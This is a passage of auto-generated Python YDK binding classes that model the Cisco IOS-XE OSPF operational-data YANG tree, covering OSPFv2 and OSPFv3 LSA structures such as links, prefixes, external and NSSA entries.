self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__()
self.yang_name = "ospfv3-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__()
self.yang_name = "ospfv3-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class IntfMultiTopology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, self).__init__()
self.yang_name = "intf-multi-topology"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
])
self.name = None
self._segment_path = lambda: "intf-multi-topology" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, ['name'], name, value)
class AreaScopeLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, self).__init__()
self.yang_name = "area-scope-lsa"
self.yang_parent_name = "ospf-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type']
self._child_classes = OrderedDict([("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
])
self.lsa_type = None
self.area_scope_lsa = YList(self)
